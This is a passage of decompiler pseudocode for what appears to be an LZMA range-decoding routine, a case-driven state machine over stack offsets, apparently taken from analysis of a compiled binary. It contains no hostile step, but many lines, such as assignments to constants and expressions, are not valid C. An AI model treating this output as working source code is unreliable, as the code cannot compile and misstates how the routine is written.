                                            													 *(_t613 - 0x88) = 3;
                                            													goto L170;
                                            												}
                                            												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                            												_t67 = _t613 - 0x70;
                                            												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                            												__eflags =  *_t67;
                                            												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                            												L23:
                                            												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                            												if( *(_t613 - 0x48) != 0) {
                                            													goto L21;
                                            												}
                                            												goto L24;
                                            											case 4:
                                            												L133:
                                            												_t531 =  *_t606;
                                            												_t589 = _t531 & 0x0000ffff;
                                            												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                            												if( *(_t613 - 0xc) >= _t565) {
                                            													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                            													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                            													 *(_t613 - 0x40) = 1;
                                            													_t532 = _t531 - (_t531 >> 5);
                                            													 *_t606 = _t532;
                                            												} else {
                                            													 *(_t613 - 0x10) = _t565;
                                            													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                            													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                            												}
                                            												if( *(_t613 - 0x10) >= 0x1000000) {
                                            													goto L139;
                                            												}
                                            											case 5:
                                            												goto L137;
                                            											case 6:
                                            												__edx = 0;
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													__eax =  *(__ebp - 4);
                                            													__ecx =  *(__ebp - 0x38);
                                            													 *(__ebp - 0x34) = 1;
                                            													 *(__ebp - 0x84) = 7;
                                            													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                            													while(1) {
                                            														L132:
                                            														 *(_t613 - 0x54) = _t606;
                                            														goto L133;
                                            													}
                                            												}
                                            												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                            												__esi =  *(__ebp - 0x60);
                                            												__cl = 8;
                                            												__cl = 8 -  *(__ebp - 0x3c);
                                            												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                            												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                            												__ecx =  *(__ebp - 0x3c);
                                            												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                            												__ecx =  *(__ebp - 4);
                                            												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                            												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                            												__eflags =  *(__ebp - 0x38) - 4;
                                            												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            												if( *(__ebp - 0x38) >= 4) {
                                            													__eflags =  *(__ebp - 0x38) - 0xa;
                                            													if( *(__ebp - 0x38) >= 0xa) {
                                            														_t98 = __ebp - 0x38;
                                            														 *_t98 =  *(__ebp - 0x38) - 6;
                                            														__eflags =  *_t98;
                                            													} else {
                                            														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                            													}
                                            												} else {
                                            													 *(__ebp - 0x38) = 0;
                                            												}
                                            												__eflags =  *(__ebp - 0x34) - __edx;
                                            												if( *(__ebp - 0x34) == __edx) {
                                            													__ebx = 0;
                                            													__ebx = 1;
                                            													goto L61;
                                            												} else {
                                            													__eax =  *(__ebp - 0x14);
                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            													__eflags = __eax -  *(__ebp - 0x74);
                                            													if(__eax >=  *(__ebp - 0x74)) {
                                            														__eax = __eax +  *(__ebp - 0x74);
                                            														__eflags = __eax;
                                            													}
                                            													__ecx =  *(__ebp - 8);
                                            													__ebx = 0;
                                            													__ebx = 1;
                                            													__al =  *((intOrPtr*)(__eax + __ecx));
                                            													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                            													goto L41;
                                            												}
                                            											case 7:
                                            												__eflags =  *(__ebp - 0x40) - 1;
                                            												if( *(__ebp - 0x40) != 1) {
                                            													__eax =  *(__ebp - 0x24);
                                            													 *(__ebp - 0x80) = 0x16;
                                            													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            													__eax =  *(__ebp - 0x28);
                                            													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            													__eax =  *(__ebp - 0x2c);
                                            													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            													__eax = 0;
                                            													__eflags =  *(__ebp - 0x38) - 7;
                                            													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            													__al = __al & 0x000000fd;
                                            													__eax = (__eflags >= 0) - 1 + 0xa;
                                            													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                            													__eax =  *(__ebp - 4);
                                            													__eax =  *(__ebp - 4) + 0x664;
                                            													__eflags = __eax;
                                            													 *(__ebp - 0x58) = __eax;
                                            													goto L69;
                                            												}
                                            												__eax =  *(__ebp - 4);
                                            												__ecx =  *(__ebp - 0x38);
                                            												 *(__ebp - 0x84) = 8;
                                            												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                            												while(1) {
                                            													L132:
                                            													 *(_t613 - 0x54) = _t606;
                                            													goto L133;
                                            												}
                                            											case 8:
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													__eax =  *(__ebp - 4);
                                            													__ecx =  *(__ebp - 0x38);
                                            													 *(__ebp - 0x84) = 0xa;
                                            													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                            												} else {
                                            													__eax =  *(__ebp - 0x38);
                                            													__ecx =  *(__ebp - 4);
                                            													__eax =  *(__ebp - 0x38) + 0xf;
                                            													 *(__ebp - 0x84) = 9;
                                            													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                            													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                            												}
                                            												while(1) {
                                            													L132:
                                            													 *(_t613 - 0x54) = _t606;
                                            													goto L133;
                                            												}
                                            											case 9:
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													goto L89;
                                            												}
                                            												__eflags =  *(__ebp - 0x60);
                                            												if( *(__ebp - 0x60) == 0) {
                                            													goto L171;
                                            												}
                                            												__eax = 0;
                                            												__eflags =  *(__ebp - 0x38) - 7;
                                            												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                            												__eflags = _t259;
                                            												0 | _t259 = _t259 + _t259 + 9;
                                            												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                            												goto L76;
                                            											case 0xa:
                                            												goto L0;
                                            											case 0xb:
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													__ecx =  *(__ebp - 0x24);
                                            													__eax =  *(__ebp - 0x20);
                                            													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            												} else {
                                            													__eax =  *(__ebp - 0x24);
                                            												}
                                            												__ecx =  *(__ebp - 0x28);
                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            												goto L88;
                                            											case 0xc:
                                            												L99:
                                            												__eflags =  *(__ebp - 0x6c);
                                            												if( *(__ebp - 0x6c) == 0) {
                                            													 *(__ebp - 0x88) = 0xc;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x70);
                                            												__eax =  *(__ebp - 0xc);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												_t334 = __ebp - 0x70;
                                            												 *_t334 =  *(__ebp - 0x70) + 1;
                                            												__eflags =  *_t334;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												__eax =  *(__ebp - 0x2c);
                                            												goto L101;
                                            											case 0xd:
                                            												L37:
                                            												__eflags =  *(__ebp - 0x6c);
                                            												if( *(__ebp - 0x6c) == 0) {
                                            													 *(__ebp - 0x88) = 0xd;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x70);
                                            												__eax =  *(__ebp - 0xc);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												_t122 = __ebp - 0x70;
                                            												 *_t122 =  *(__ebp - 0x70) + 1;
                                            												__eflags =  *_t122;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												L39:
                                            												__eax =  *(__ebp - 0x40);
                                            												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                            													goto L48;
                                            												}
                                            												__eflags = __ebx - 0x100;
                                            												if(__ebx >= 0x100) {
                                            													goto L54;
                                            												}
                                            												L41:
                                            												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                            												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                            												__ecx =  *(__ebp - 0x58);
                                            												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                            												 *(__ebp - 0x48) = __eax;
                                            												__eax = __eax + 1;
                                            												__eax = __eax << 8;
                                            												__eax = __eax + __ebx;
                                            												__esi =  *(__ebp - 0x58) + __eax * 2;
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            												__ax =  *__esi;
                                            												 *(__ebp - 0x54) = __esi;
                                            												__edx = __ax & 0x0000ffff;
                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                            												if( *(__ebp - 0xc) >= __ecx) {
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            													__cx = __ax;
                                            													 *(__ebp - 0x40) = 1;
                                            													__cx = __ax >> 5;
                                            													__eflags = __eax;
                                            													__ebx = __ebx + __ebx + 1;
                                            													 *__esi = __ax;
                                            												} else {
                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                            													 *(__ebp - 0x10) = __ecx;
                                            													0x800 = 0x800 - __edx;
                                            													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                            													__ebx = __ebx + __ebx;
                                            													 *__esi = __cx;
                                            												}
                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            												 *(__ebp - 0x44) = __ebx;
                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                            													goto L39;
                                            												} else {
                                            													goto L37;
                                            												}
                                            											case 0xe:
                                            												L46:
                                            												__eflags =  *(__ebp - 0x6c);
                                            												if( *(__ebp - 0x6c) == 0) {
                                            													 *(__ebp - 0x88) = 0xe;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x70);
                                            												__eax =  *(__ebp - 0xc);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												_t156 = __ebp - 0x70;
                                            												 *_t156 =  *(__ebp - 0x70) + 1;
                                            												__eflags =  *_t156;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												while(1) {
                                            													L48:
                                            													__eflags = __ebx - 0x100;
                                            													if(__ebx >= 0x100) {
                                            														break;
                                            													}
                                            													__eax =  *(__ebp - 0x58);
                                            													__edx = __ebx + __ebx;
                                            													__ecx =  *(__ebp - 0x10);
                                            													__esi = __edx + __eax;
                                            													__ecx =  *(__ebp - 0x10) >> 0xb;
                                            													__ax =  *__esi;
                                            													 *(__ebp - 0x54) = __esi;
                                            													__edi = __ax & 0x0000ffff;
                                            													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            													__eflags =  *(__ebp - 0xc) - __ecx;
                                            													if( *(__ebp - 0xc) >= __ecx) {
                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            														__cx = __ax;
                                            														_t170 = __edx + 1; // 0x1
                                            														__ebx = _t170;
                                            														__cx = __ax >> 5;
                                            														__eflags = __eax;
                                            														 *__esi = __ax;
                                            													} else {
                                            														 *(__ebp - 0x10) = __ecx;
                                            														0x800 = 0x800 - __edi;
                                            														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            														__ebx = __ebx + __ebx;
                                            														 *__esi = __cx;
                                            													}
                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            													 *(__ebp - 0x44) = __ebx;
                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                            														continue;
                                            													} else {
                                            														goto L46;
                                            													}
                                            												}
                                            												L54:
                                            												_t173 = __ebp - 0x34;
                                            												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                            												__eflags =  *_t173;
                                            												goto L55;
                                            											case 0xf:
                                            												L58:
                                            												__eflags =  *(__ebp - 0x6c);
                                            												if( *(__ebp - 0x6c) == 0) {
                                            													 *(__ebp - 0x88) = 0xf;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x70);
                                            												__eax =  *(__ebp - 0xc);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												_t203 = __ebp - 0x70;
                                            												 *_t203 =  *(__ebp - 0x70) + 1;
                                            												__eflags =  *_t203;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												L60:
                                            												__eflags = __ebx - 0x100;
                                            												if(__ebx >= 0x100) {
                                            													L55:
                                            													__al =  *(__ebp - 0x44);
                                            													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                            													goto L56;
                                            												}
                                            												L61:
                                            												__eax =  *(__ebp - 0x58);
                                            												__edx = __ebx + __ebx;
                                            												__ecx =  *(__ebp - 0x10);
                                            												__esi = __edx + __eax;
                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                            												__ax =  *__esi;
                                            												 *(__ebp - 0x54) = __esi;
                                            												__edi = __ax & 0x0000ffff;
                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                            												if( *(__ebp - 0xc) >= __ecx) {
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            													__cx = __ax;
                                            													_t217 = __edx + 1; // 0x1
                                            													__ebx = _t217;
                                            													__cx = __ax >> 5;
                                            													__eflags = __eax;
                                            													 *__esi = __ax;
                                            												} else {
                                            													 *(__ebp - 0x10) = __ecx;
                                            													0x800 = 0x800 - __edi;
                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            													__ebx = __ebx + __ebx;
                                            													 *__esi = __cx;
                                            												}
                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            												 *(__ebp - 0x44) = __ebx;
                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                            													goto L60;
                                            												} else {
                                            													goto L58;
                                            												}
                                            											case 0x10:
                                            												L109:
                                            												__eflags =  *(__ebp - 0x6c);
                                            												if( *(__ebp - 0x6c) == 0) {
                                            													 *(__ebp - 0x88) = 0x10;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x70);
                                            												__eax =  *(__ebp - 0xc);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												_t365 = __ebp - 0x70;
                                            												 *_t365 =  *(__ebp - 0x70) + 1;
                                            												__eflags =  *_t365;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												goto L111;
                                            											case 0x11:
                                            												goto L69;
                                            											case 0x12:
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													__eax =  *(__ebp - 0x58);
                                            													 *(__ebp - 0x84) = 0x13;
                                            													__esi =  *(__ebp - 0x58) + 2;
                                            													while(1) {
                                            														L132:
                                            														 *(_t613 - 0x54) = _t606;
                                            														goto L133;
                                            													}
                                            												}
                                            												__eax =  *(__ebp - 0x4c);
                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                            												__ecx =  *(__ebp - 0x58);
                                            												__eax =  *(__ebp - 0x4c) << 4;
                                            												__eflags = __eax;
                                            												__eax =  *(__ebp - 0x58) + __eax + 4;
                                            												goto L130;
                                            											case 0x13:
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													_t469 = __ebp - 0x58;
                                            													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                            													__eflags =  *_t469;
                                            													 *(__ebp - 0x30) = 0x10;
                                            													 *(__ebp - 0x40) = 8;
                                            													L144:
                                            													 *(__ebp - 0x7c) = 0x14;
                                            													goto L145;
                                            												}
                                            												__eax =  *(__ebp - 0x4c);
                                            												__ecx =  *(__ebp - 0x58);
                                            												__eax =  *(__ebp - 0x4c) << 4;
                                            												 *(__ebp - 0x30) = 8;
                                            												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                            												L130:
                                            												 *(__ebp - 0x58) = __eax;
                                            												 *(__ebp - 0x40) = 3;
                                            												goto L144;
                                            											case 0x14:
                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                            												__eax =  *(__ebp - 0x80);
                                            												 *(_t613 - 0x88) = _t533;
                                            												goto L1;
                                            											case 0x15:
                                            												__eax = 0;
                                            												__eflags =  *(__ebp - 0x38) - 7;
                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            												__al = __al & 0x000000fd;
                                            												__eax = (__eflags >= 0) - 1 + 0xb;
                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                            												goto L120;
                                            											case 0x16:
                                            												__eax =  *(__ebp - 0x30);
                                            												__eflags = __eax - 4;
                                            												if(__eax >= 4) {
                                            													_push(3);
                                            													_pop(__eax);
                                            												}
                                            												__ecx =  *(__ebp - 4);
                                            												 *(__ebp - 0x40) = 6;
                                            												__eax = __eax << 7;
                                            												 *(__ebp - 0x7c) = 0x19;
                                            												 *(__ebp - 0x58) = __eax;
                                            												goto L145;
                                            											case 0x17:
                                            												L145:
                                            												__eax =  *(__ebp - 0x40);
                                            												 *(__ebp - 0x50) = 1;
                                            												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                            												goto L149;
                                            											case 0x18:
                                            												L146:
                                            												__eflags =  *(__ebp - 0x6c);
                                            												if( *(__ebp - 0x6c) == 0) {
                                            													 *(__ebp - 0x88) = 0x18;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x70);
                                            												__eax =  *(__ebp - 0xc);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												_t484 = __ebp - 0x70;
                                            												 *_t484 =  *(__ebp - 0x70) + 1;
                                            												__eflags =  *_t484;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												L148:
                                            												_t487 = __ebp - 0x48;
                                            												 *_t487 =  *(__ebp - 0x48) - 1;
                                            												__eflags =  *_t487;
                                            												L149:
                                            												__eflags =  *(__ebp - 0x48);
                                            												if( *(__ebp - 0x48) <= 0) {
                                            													__ecx =  *(__ebp - 0x40);
                                            													__ebx =  *(__ebp - 0x50);
                                            													0 = 1;
                                            													__eax = 1 << __cl;
                                            													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                            													__eax =  *(__ebp - 0x7c);
                                            													 *(__ebp - 0x44) = __ebx;
                                            													while(1) {
                                            														 *(_t613 - 0x88) = _t533;
                                            														goto L1;
                                            													}
                                            												}
                                            												__eax =  *(__ebp - 0x50);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                            												__eax =  *(__ebp - 0x58);
                                            												__esi = __edx + __eax;
                                            												 *(__ebp - 0x54) = __esi;
                                            												__ax =  *__esi;
                                            												__edi = __ax & 0x0000ffff;
                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                            												if( *(__ebp - 0xc) >= __ecx) {
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            													__cx = __ax;
                                            													__cx = __ax >> 5;
                                            													__eax = __eax - __ecx;
                                            													__edx = __edx + 1;
                                            													__eflags = __edx;
                                            													 *__esi = __ax;
                                            													 *(__ebp - 0x50) = __edx;
                                            												} else {
                                            													 *(__ebp - 0x10) = __ecx;
                                            													0x800 = 0x800 - __edi;
                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                            													 *__esi = __cx;
                                            												}
                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                            													goto L148;
                                            												} else {
                                            													goto L146;
                                            												}
                                            											case 0x19:
                                            												__eflags = __ebx - 4;
                                            												if(__ebx < 4) {
                                            													 *(__ebp - 0x2c) = __ebx;
                                            													L119:
                                            													_t393 = __ebp - 0x2c;
                                            													 *_t393 =  *(__ebp - 0x2c) + 1;
                                            													__eflags =  *_t393;
                                            													L120:
                                            													__eax =  *(__ebp - 0x2c);
                                            													__eflags = __eax;
                                            													if(__eax == 0) {
                                            														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                            														goto L170;
                                            													}
                                            													__eflags = __eax -  *(__ebp - 0x60);
                                            													if(__eax >  *(__ebp - 0x60)) {
                                            														goto L171;
                                            													}
                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                            													__eax =  *(__ebp - 0x30);
                                            													_t400 = __ebp - 0x60;
                                            													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                            													__eflags =  *_t400;
                                            													goto L123;
                                            												}
                                            												__ecx = __ebx;
                                            												__eax = __ebx;
                                            												__ecx = __ebx >> 1;
                                            												__eax = __ebx & 0x00000001;
                                            												__ecx = (__ebx >> 1) - 1;
                                            												__al = __al | 0x00000002;
                                            												__eax = (__ebx & 0x00000001) << __cl;
                                            												__eflags = __ebx - 0xe;
                                            												 *(__ebp - 0x2c) = __eax;
                                            												if(__ebx >= 0xe) {
                                            													__ebx = 0;
                                            													 *(__ebp - 0x48) = __ecx;
                                            													L102:
                                            													__eflags =  *(__ebp - 0x48);
                                            													if( *(__ebp - 0x48) <= 0) {
                                            														__eax = __eax + __ebx;
                                            														 *(__ebp - 0x40) = 4;
                                            														 *(__ebp - 0x2c) = __eax;
                                            														__eax =  *(__ebp - 4);
                                            														__eax =  *(__ebp - 4) + 0x644;
                                            														__eflags = __eax;
                                            														L108:
                                            														__ebx = 0;
                                            														 *(__ebp - 0x58) = __eax;
                                            														 *(__ebp - 0x50) = 1;
                                            														 *(__ebp - 0x44) = 0;
                                            														 *(__ebp - 0x48) = 0;
                                            														L112:
                                            														__eax =  *(__ebp - 0x40);
                                            														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                            														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                            															_t391 = __ebp - 0x2c;
                                            															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                            															__eflags =  *_t391;
                                            															goto L119;
                                            														}
                                            														__eax =  *(__ebp - 0x50);
                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                            														__eax =  *(__ebp - 0x58);
                                            														__esi = __edi + __eax;
                                            														 *(__ebp - 0x54) = __esi;
                                            														__ax =  *__esi;
                                            														__ecx = __ax & 0x0000ffff;
                                            														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                            														__eflags =  *(__ebp - 0xc) - __edx;
                                            														if( *(__ebp - 0xc) >= __edx) {
                                            															__ecx = 0;
                                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                            															__ecx = 1;
                                            															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                            															__ebx = 1;
                                            															__ecx =  *(__ebp - 0x48);
                                            															__ebx = 1 << __cl;
                                            															__ecx = 1 << __cl;
                                            															__ebx =  *(__ebp - 0x44);
                                            															__ebx =  *(__ebp - 0x44) | __ecx;
                                            															__cx = __ax;
                                            															__cx = __ax >> 5;
                                            															__eax = __eax - __ecx;
                                            															__edi = __edi + 1;
                                            															__eflags = __edi;
                                            															 *(__ebp - 0x44) = __ebx;
                                            															 *__esi = __ax;
                                            															 *(__ebp - 0x50) = __edi;
                                            														} else {
                                            															 *(__ebp - 0x10) = __edx;
                                            															0x800 = 0x800 - __ecx;
                                            															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                            															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                            															 *__esi = __dx;
                                            														}
                                            														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            														if( *(__ebp - 0x10) >= 0x1000000) {
                                            															L111:
                                            															_t368 = __ebp - 0x48;
                                            															 *_t368 =  *(__ebp - 0x48) + 1;
                                            															__eflags =  *_t368;
                                            															goto L112;
                                            														} else {
                                            															goto L109;
                                            														}
                                            													}
                                            													__ecx =  *(__ebp - 0xc);
                                            													__ebx = __ebx + __ebx;
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                            													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            													 *(__ebp - 0x44) = __ebx;
                                            													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                            														__ecx =  *(__ebp - 0x10);
                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            														__ebx = __ebx | 0x00000001;
                                            														__eflags = __ebx;
                                            														 *(__ebp - 0x44) = __ebx;
                                            													}
                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                            														L101:
                                            														_t338 = __ebp - 0x48;
                                            														 *_t338 =  *(__ebp - 0x48) - 1;
                                            														__eflags =  *_t338;
                                            														goto L102;
                                            													} else {
                                            														goto L99;
                                            													}
                                            												}
                                            												__edx =  *(__ebp - 4);
                                            												__eax = __eax - __ebx;
